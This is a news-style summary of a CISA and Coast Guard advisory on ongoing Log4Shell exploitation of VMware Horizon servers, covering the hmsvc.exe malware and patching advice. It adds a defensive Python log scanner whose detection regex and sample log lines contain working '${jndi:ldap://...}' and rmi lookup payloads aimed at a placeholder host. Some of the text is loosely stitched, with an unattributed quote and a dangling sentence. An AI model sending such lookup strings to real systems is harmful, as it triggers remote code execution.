The US Cybersecurity and Infrastructure Security Agency (CISA) and the US Coast Guard Cyber Command (CGCYBER) have announced in a Cybersecurity Advisory (CSA) that the Log4Shell vulnerability (CVE-2021-44228) is still being exploited by attackers.
Hacker groups, including "APT" groups, have been found still exploiting this weakness, and they have been observed attacking VMware Horizon servers and the Unified Access Gateway (UAG) to gain initial access to organizations that have not applied the available patches.
The CSA provides information, including tactics, techniques and procedures and indicators of compromise, obtained from two related incident response engagements and from malware analysis of samples recovered from victim networks.
For those unfamiliar with Log4Shell, it is a vulnerability that first surfaced in December and that lives in Apache Log4j, a popular logging framework for Java applications. It allows arbitrary code to be executed when a specially formatted value written to the logger takes the form "${jndi:URL}".
The vulnerability is notable because the attack can be carried out against Java applications that log values obtained from external sources, for example by echoing problematic values in error messages.
It appears that almost all projects using frameworks such as Apache Struts, Apache Solr, Apache Druid or Apache Flink are affected, including Steam, Apple iCloud, and Minecraft clients and servers.
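Because the trigger is a lookup string that reaches the logger through user-controlled input, one practical defensive check is to scan the logs of an internet-facing application for such strings. The following is an added example, not code from the advisory or from Apache Log4j: a small Python scanner that flags the "${jndi:...}" lookup pattern in access-log lines and reports which lookup scheme (ldap, rmi, ...) was requested. The regular expression and the sample log lines are constructed for this example.

```python
import re
from typing import Dict, List

# Matches a Log4j lookup beginning with "${jndi:" (case-insensitive, with optional
# whitespace after the colon, as in the advisory's "{jndi: URL}" notation) and
# captures the lookup scheme such as ldap or rmi. This pattern is an assumption
# made for the example; it is not taken from the advisory.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def find_jndi_lookups(line: str) -> List[str]:
    """Return the lookup schemes found in one log line, e.g. ['ldap']."""
    return [m.group(1).lower() for m in JNDI_LOOKUP.finditer(line)]


def scan_log(lines) -> List[Dict[str, object]]:
    """Scan an iterable of log lines and return one finding per suspicious line."""
    findings = []
    for n, line in enumerate(lines, 1):
        schemes = find_jndi_lookups(line)
        if schemes:
            findings.append({"line": n, "schemes": schemes, "text": line.rstrip()})
    return findings


# Constructed sample access-log lines (not real traffic). Lines 3 and 4 carry a
# lookup string in the User-Agent field, a user-controlled value that a web
# application might hand to Log4j unchanged.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [10/Dec/2021:10:00:02 +0000] "GET /login HTTP/1.1" 200 1024 "-" "curl/7.79.1"',
    '198.51.100.9 - - [10/Dec/2021:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '198.51.100.9 - - [10/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${JNDI: rmi://example.invalid/b}"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: jndi lookup via {', '.join(f['schemes'])}")
```

Run against a real access log, the script points at the lines worth correlating with outbound LDAP or RMI connections from the application host; a hit does not by itself prove the lookup succeeded, so the result should feed an investigation rather than stand as a verdict.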
The full advisory describes several recent incidents in which cybercriminals successfully used the vulnerability to gain access. In at least one confirmed compromise, the actors collected and exfiltrated sensitive information from the victim's network.
Threat hunting performed by the US Coast Guard Cyber Command shows that threat actors exploited Log4Shell to gain initial network access to an undisclosed victim. They loaded a malware file called "hmsvc.exe", which masquerades as the Microsoft Windows SysInternals LogonSessions security utility.
Embedded in the malicious program are various capabilities, including keystroke logging and the execution of additional payloads, and it provides a graphical user interface for accessing the victim's Windows desktop system. It can operate as a command-and-control proxy, allowing a remote operator to move further into the network, the agencies say.
The analysis also found that hmsvc.exe was running as the local system account with the highest level of privilege, but it did not explain how the attackers elevated their privileges to that level.
CISA and the Coast Guard recommend that all organizations install the updated builds to ensure that affected VMware Horizon and UAG systems are running the latest version.
The advisory adds that organizations should keep software up to date and prioritize patching known exploited vulnerabilities. Internet-facing attack surfaces should be minimized by hosting essential services in a segregated demilitarized zone.
"Based on the number of Horizon servers in our unpatched dataset (only 18% patched since last Friday night), there is a significant risk that this will adversely affect hundreds, if not thousands, of businesses. This weekend also marks the first time we have seen evidence of widespread escalation, from initial access to the start of hostile actions on Horizon servers."
Doing so enforces strict access controls at the network perimeter and avoids hosting internet-facing services that are not essential to business operations.
CISA and CGCYBER encourage users and administrators to update all affected VMware Horizon and UAG systems to the latest versions. If updates or workarounds were not applied promptly after VMware released its Log4Shell updates, treat all affected VMware systems as compromised. See the CSA "Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems" for more information and additional recommendations.
Finally, if you are interested in learning more about this, you can find the details at the following link.